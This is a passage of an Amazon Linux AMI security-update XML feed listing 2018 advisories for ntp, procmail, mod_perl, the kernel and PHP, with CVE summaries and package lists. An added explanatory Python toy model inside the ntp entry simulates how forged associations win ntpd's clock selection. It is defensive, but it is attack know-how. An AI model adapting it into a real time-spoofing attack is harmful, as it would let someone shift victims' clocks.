arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.68.rc1.58.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.68.rc1.58.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.68.rc1.58.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.68.rc1.58.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.68.rc1.58.amzn1.i686.rpm</filename></package><package name="bind" version="9.8.2" release="0.68.rc1.58.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.68.rc1.58.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.68.rc1.58.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.68.rc1.58.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1083</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1083: low priority package update for ntp</title><issued date="2018-09-19 17:19:00" /><updated date="2018-09-19 23:35:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-7170:
ntpd in ntp 4.2.x before 4.2.8p7 and 4.3.x before 4.3.92 allows authenticated users that know the private symmetric key to create arbitrarily-many ephemeral associations in order to win the clock selection of ntpd and modify a victim&#039;s clock via a Sybil attack. This issue exists because of an incomplete fix for CVE-2016-1549.
1550214:
CVE-2018-7170 ntp: Ephemeral association time spoofing additional protection
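The following is an added toy model, not ntpd code, of why the Sybil attack above works: ntpd's selection step keeps the largest group of associations whose error intervals overlap and requires that group to be a strict majority, so an attacker who can mint associations at will simply outnumbers the honest servers. The three honest servers, the attacker's claimed offset and the cap parameter (a stand-in for a limit on ephemeral associations per source) are all constructed for the illustration; offsets are integers in milliseconds to keep the arithmetic exact.

```python
# Added toy model (not ntpd code) of how ntpd's intersection step can be
# outvoted by many ephemeral associations that agree with each other.
import operator

def largest_agreeing_group(candidates):
    '''candidates: list of (offset, root_distance) pairs, one per association,
    in milliseconds. Each association claims the true offset lies in
    [offset - root_distance, offset + root_distance]. Sweep the interval
    edges to find a point covered by the most intervals and return
    (point, survivors) where survivors are the associations covering it.
    This is the Marzullo-style intersection ntpd uses to pick truechimers.'''
    if not candidates:
        return None, []
    edges = []
    for off, dist in candidates:
        edges.append((off - dist, 1))     # interval opens
        edges.append((off + dist, -1))    # interval closes
    edges.sort(key=lambda e: (e[0], -e[1]))   # at ties, open before close
    best_point, best_count, count = None, 0, 0
    for x, delta in edges:
        count += delta
        if operator.gt(count, best_count):
            best_point, best_count = x, count
    survivors = [(off, dist) for off, dist in candidates
                 if operator.le(abs(best_point - off), dist)]
    return best_point, survivors

def select_offset(candidates):
    '''Return the offset ntpd would steer toward, or None when no strict
    majority of associations agrees (ntpd then refuses to select).'''
    _, survivors = largest_agreeing_group(candidates)
    if not operator.gt(2 * len(survivors), len(candidates)):
        return None
    # ntpd weights the combine step by root distance; a plain mean is
    # enough to show which group won.
    return sum(off for off, _ in survivors) / len(survivors)

# Constructed: three configured servers, all within a few ms of zero.
HONEST = [(2, 10), (-1, 12), (4, 9)]

def run_scenario(n_ephemeral, cap=None):
    '''Three honest servers versus n_ephemeral associations spawned by an
    attacker who holds the symmetric key and claims a one-hour offset with
    tight error bounds. cap models a post-fix limit on how many ephemeral
    associations one source may create.'''
    sybils = [(3_600_000, 5)] * n_ephemeral
    if cap is not None:
        sybils = sybils[:cap]
    return select_offset(HONEST + sybils)

if __name__ == '__main__':
    print('no attack        :', run_scenario(0))
    print('3 sybils (tie)   :', run_scenario(3))
    print('10 sybils        :', run_scenario(10))
    print('10 sybils, cap 2 :', run_scenario(10, cap=2))
```

With ten attacker associations the selected offset is the attacker's hour; with the count capped at two the honest majority is restored; at exactly three versus three there is no majority and nothing is selected. Beyond updating, the operational check is that symmetric keys used for authenticated associations are treated as credentials that confer this ability, and that ephemeral associations are disabled where they are not needed.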
CVE-2018-12327:
The ntpq and ntpdc command-line utilities that are part of ntp package are vulnerable to stack-based buffer overflow via crafted hostname. Applications using these vulnerable utilities with an untrusted input may be potentially exploited, resulting in a crash or arbitrary code execution under privileges of that application.
1593580:
CVE-2018-12327 ntp: Stack-based buffer overflow in ntpq and ntpdc allows denial of service or code execution
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12327" title="" id="CVE-2018-12327" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7170" title="" id="CVE-2018-7170" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ntp-perl" version="4.2.8p12" release="1.39.amzn1" epoch="0" arch="noarch"><filename>Packages/ntp-perl-4.2.8p12-1.39.amzn1.noarch.rpm</filename></package><package name="ntp-debuginfo" version="4.2.8p12" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntp-debuginfo-4.2.8p12-1.39.amzn1.x86_64.rpm</filename></package><package name="ntp" version="4.2.8p12" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntp-4.2.8p12-1.39.amzn1.x86_64.rpm</filename></package><package name="ntp-doc" version="4.2.8p12" release="1.39.amzn1" epoch="0" arch="noarch"><filename>Packages/ntp-doc-4.2.8p12-1.39.amzn1.noarch.rpm</filename></package><package name="ntpdate" version="4.2.8p12" release="1.39.amzn1" epoch="0" arch="x86_64"><filename>Packages/ntpdate-4.2.8p12-1.39.amzn1.x86_64.rpm</filename></package><package name="ntpdate" version="4.2.8p12" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/ntpdate-4.2.8p12-1.39.amzn1.i686.rpm</filename></package><package name="ntp" version="4.2.8p12" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/ntp-4.2.8p12-1.39.amzn1.i686.rpm</filename></package><package name="ntp-debuginfo" version="4.2.8p12" release="1.39.amzn1" epoch="0" arch="i686"><filename>Packages/ntp-debuginfo-4.2.8p12-1.39.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1084</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1084: important priority package update for procmail</title><issued date="2018-09-19 19:22:00" 
/><updated date="2018-09-19 23:36:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2017-16844:
A heap-based buffer overflow flaw was found in procmail&#039;s formail utility. A remote attacker could send a specially crafted email that, when processed by formail, could cause formail to crash or, possibly, execute arbitrary code as the user running formail.
1500070:
CVE-2017-16844 procmail: Heap-based buffer overflow in loadbuf function in formisc.c
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16844" title="" id="CVE-2017-16844" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="procmail-debuginfo" version="3.22" release="25.1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/procmail-debuginfo-3.22-25.1.7.amzn1.x86_64.rpm</filename></package><package name="procmail" version="3.22" release="25.1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/procmail-3.22-25.1.7.amzn1.x86_64.rpm</filename></package><package name="procmail" version="3.22" release="25.1.7.amzn1" epoch="0" arch="i686"><filename>Packages/procmail-3.22-25.1.7.amzn1.i686.rpm</filename></package><package name="procmail-debuginfo" version="3.22" release="25.1.7.amzn1" epoch="0" arch="i686"><filename>Packages/procmail-debuginfo-3.22-25.1.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1085</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1085: important priority package update for mod_perl mod24_perl</title><issued date="2018-10-03 02:54:00" /><updated date="2018-10-04 22:01:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2011-2767:
mod_perl 2.0 through 2.0.10 allows attackers to execute arbitrary Perl code by placing it in a user-owned .htaccess file, because (contrary to the documentation) there is no configuration option that permits Perl code for the administrator&#039;s control of HTTP request processing without also permitting unprivileged users to run Perl code in the context of the user account that runs Apache HTTP Server processes.
1623265:
CVE-2011-2767 mod_perl: arbitrary Perl code execution in the context of the user account via a user-owned .htaccess
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2767" title="" id="CVE-2011-2767" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_perl-devel" version="2.0.7" release="7.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_perl-devel-2.0.7-7.20.amzn1.x86_64.rpm</filename></package><package name="mod24_perl" version="2.0.7" release="7.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_perl-2.0.7-7.20.amzn1.x86_64.rpm</filename></package><package name="mod24_perl-debuginfo" version="2.0.7" release="7.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_perl-debuginfo-2.0.7-7.20.amzn1.x86_64.rpm</filename></package><package name="mod24_perl" version="2.0.7" release="7.20.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_perl-2.0.7-7.20.amzn1.i686.rpm</filename></package><package name="mod24_perl-devel" version="2.0.7" release="7.20.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_perl-devel-2.0.7-7.20.amzn1.i686.rpm</filename></package><package name="mod24_perl-debuginfo" version="2.0.7" release="7.20.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_perl-debuginfo-2.0.7-7.20.amzn1.i686.rpm</filename></package><package name="mod_perl" version="2.0.7" release="7.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_perl-2.0.7-7.28.amzn1.x86_64.rpm</filename></package><package name="mod_perl-debuginfo" version="2.0.7" release="7.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_perl-debuginfo-2.0.7-7.28.amzn1.x86_64.rpm</filename></package><package name="mod_perl-devel" version="2.0.7" release="7.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_perl-devel-2.0.7-7.28.amzn1.x86_64.rpm</filename></package><package name="mod_perl-debuginfo" version="2.0.7" release="7.28.amzn1" epoch="0" arch="i686"><filename>Packages/mod_perl-debuginfo-2.0.7-7.28.amzn1.i686.rpm</filename></package><package 
name="mod_perl-devel" version="2.0.7" release="7.28.amzn1" epoch="0" arch="i686"><filename>Packages/mod_perl-devel-2.0.7-7.28.amzn1.i686.rpm</filename></package><package name="mod_perl" version="2.0.7" release="7.28.amzn1" epoch="0" arch="i686"><filename>Packages/mod_perl-2.0.7-7.28.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1086</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1086: important priority package update for kernel</title><issued date="2018-10-03 02:57:00" /><updated date="2020-06-03 18:10:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-20856:
An issue was discovered in the Linux kernel before 4.18.7. In block/blk-core.c, there is an __blk_drain_queue() use-after-free because a certain error case is mishandled.
1738705:
CVE-2018-20856 kernel: Use-after-free in __blk_drain_queue() function in block/blk-core.c
CVE-2018-17182:
A security flaw was discovered in the Linux kernel. The vmacache_flush_all() function in mm/vmacache.c mishandles sequence number overflows. An attacker can trigger a use-after-free (and possibly gain privileges) via certain thread creation, map, unmap, invalidation, and dereference operations.
1631205:
CVE-2018-17182 kernel: Use-after-free in the vmacache_flush_all function resulting in a possible privilege escalation
CVE-2018-16658:
An information leak was discovered in the Linux kernel in the cdrom_ioctl_drive_status() function in drivers/cdrom/cdrom.c that could be used by local attackers to read kernel memory at a certain location.
1627731:
CVE-2018-16658 kernel: Information leak in cdrom_ioctl_drive_status
CVE-2018-14633:
A security flaw was found in the chap_server_compute_md5() function in the iSCSI target code in the Linux kernel, in the way an authentication request from an iSCSI initiator is processed. An unauthenticated remote attacker can cause a stack buffer overflow and smash up to 17 bytes of the stack. The attack requires the iSCSI target to be enabled on the victim host. Depending on how the target&#039;s code was built (i.e. depending on the compiler, compile flags and hardware architecture) an attack may lead to a system crash and thus to a denial of service, or possibly to non-authorized access to data exported by an iSCSI target. Due to the nature of the flaw, privilege escalation cannot be fully ruled out, although we believe it is highly unlikely.
1626035:
CVE-2018-14633 kernel: stack-based buffer overflow in chap_server_compute_md5() in iscsi target
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14633" title="" id="CVE-2018-14633" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16658" title="" id="CVE-2018-16658" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17182" title="" id="CVE-2018-17182" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20856" title="" id="CVE-2018-20856" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo" version="4.14.72" release="68.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.72-68.55.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.72" release="68.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.72-68.55.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.72" release="68.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.72-68.55.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.72" release="68.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.72-68.55.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.72" release="68.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.72-68.55.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.72" release="68.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.72-68.55.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.72" release="68.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.72-68.55.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.72" release="68.55.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-4.14.72-68.55.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.72" release="68.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.72-68.55.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.72" release="68.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.72-68.55.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.72" release="68.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.72-68.55.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.72" release="68.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.72-68.55.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.72" release="68.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.72-68.55.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.72" release="68.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.72-68.55.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.72" release="68.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.72-68.55.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.72" release="68.55.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.72-68.55.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.72" release="68.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.72-68.55.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.72" release="68.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.72-68.55.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.72" release="68.55.amzn1" epoch="0" 
arch="i686"><filename>Packages/kernel-devel-4.14.72-68.55.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.72" release="68.55.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.72-68.55.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2018-1087</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1087: important priority package update for kernel</title><issued date="2018-10-03 19:23:00" /><updated date="2018-10-04 22:14:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-14634:
An integer overflow flaw was found in the Linux kernel&#039;s create_elf_tables() function. An unprivileged local user with access to a SUID (or otherwise privileged) binary could use this flaw to escalate their privileges on the system.
1624498:
CVE-2018-14634 kernel: Integer overflow in Linux's create_elf_tables function
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14634" title="" id="CVE-2018-14634" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel" version="4.14.26" release="46.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.26-46.32.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.26" release="46.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.26-46.32.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.26" release="46.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.26-46.32.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.26" release="46.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.26-46.32.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.26" release="46.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.26-46.32.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.26" release="46.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.26-46.32.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.26" release="46.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.26-46.32.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.26" release="46.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.26-46.32.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.26" release="46.32.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.26-46.32.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.26" release="46.32.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.26-46.32.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.26" release="46.32.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.26-46.32.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.26" release="46.32.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.26-46.32.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.26" release="46.32.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.26-46.32.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.26" release="46.32.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.26-46.32.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.26" release="46.32.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.26-46.32.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.26" release="46.32.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.26-46.32.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.26" release="46.32.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.26-46.32.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.26" release="46.32.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.26-46.32.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.26" release="46.32.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.26-46.32.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.26" release="46.32.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.26-46.32.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" 
from="linux-security@amazon.com"><id>ALAS-2018-1090</id><title>Amazon Linux AMI 2014.03 - ALAS-2018-1090: medium priority package update for php56 php70 php71 php72</title><issued date="2018-10-17 21:56:00" /><updated date="2018-10-18 22:18:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2018-17082:
The Apache2 component in PHP before 5.6.38, 7.0.x before 7.0.32, 7.1.x before 7.1.22, and 7.2.x before 7.2.10 allows XSS via the body of a &quot;Transfer-Encoding: chunked&quot; request, because the bucket brigade is mishandled in the php_handler function in sapi/apache2handler/sapi_apache2.c.
1629552:
CVE-2018-17082 php: Cross-site scripting (XSS) flaw in Apache2 component via body of 'Transfer-Encoding: chunked' request
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17082" title="" id="CVE-2018-17082" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php56-recode" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-recode-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-process" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-process-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-dba" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dba-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-opcache" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-opcache-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-odbc" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-odbc-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-debuginfo" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-debuginfo-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-mbstring" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mbstring-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-common" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-common-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-devel" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-devel-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-xml" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xml-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-dbg" 
version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-dbg-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-bcmath" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-bcmath-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-mysqlnd" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mysqlnd-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-imap" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-imap-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-pgsql" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pgsql-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-pspell" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pspell-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-gmp" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gmp-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-embedded" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-embedded-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-intl" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-intl-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-tidy" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-tidy-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-snmp" version="5.6.38" release="1.140.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php56-snmp-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-ldap" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-ldap-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-gd" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-gd-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-mcrypt" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mcrypt-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-mssql" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-mssql-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-fpm" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-fpm-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-cli" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-cli-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-enchant" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-enchant-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-xmlrpc" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-xmlrpc-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-soap" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-soap-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-pdo" version="5.6.38" release="1.140.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pdo-5.6.38-1.140.amzn1.x86_64.rpm</filename></package><package name="php56-soap" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-soap-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-debuginfo" 
version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-debuginfo-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-ldap" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-ldap-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-intl" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-intl-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-opcache" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-opcache-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-enchant" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-enchant-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-recode" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-recode-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-xmlrpc" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-xmlrpc-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-mssql" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-mssql-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-fpm" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-fpm-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-pgsql" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pgsql-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-odbc" version="5.6.38" release="1.140.amzn1" epoch="0" arch="i686"><filename>Packages/php56-odbc-5.6.38-1.140.amzn1.i686.rpm</filename></package><package name="php56-pspell" version="5.6.38" release="1.140.amzn1" epoch="0" 
